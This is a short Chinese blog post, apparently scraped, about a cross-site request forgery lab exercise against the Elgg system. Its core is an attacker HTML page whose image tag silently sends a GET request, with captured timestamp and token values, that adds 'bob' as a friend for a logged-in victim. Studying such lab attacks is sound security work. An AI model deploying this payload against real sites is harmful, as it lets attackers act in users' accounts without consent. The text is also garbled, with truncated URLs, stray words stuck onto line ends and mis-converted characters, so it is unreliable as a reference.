一次crsf攻擊實驗 針對get請求

實驗樓實驗之elgg系統攻擊實驗html

有一個添加用戶bob的請求連接以下:網站

http://www.csrflabelgg.com/ac...spa

咱們能夠在www.csrflabattacker.com構造一個頁面,讓合法登陸用戶訪問後,就會添加bob爲好友csrf

<html>
<img src="http://www.csrflabelgg.com/ac...;__elgg_ts=1524817660&__elgg_token=f581b9c0b6fab2aa1c5b5c64a7b4cf0c">
</html> (注意這裏的ts和token取當時環境抓包的值)htm

這樣用戶Alice在登陸 http://www.csrflabelgg.com 後,再登陸攻擊網站,攻擊語句就會生效。
wmtoken

相關文章
相關標籤/搜索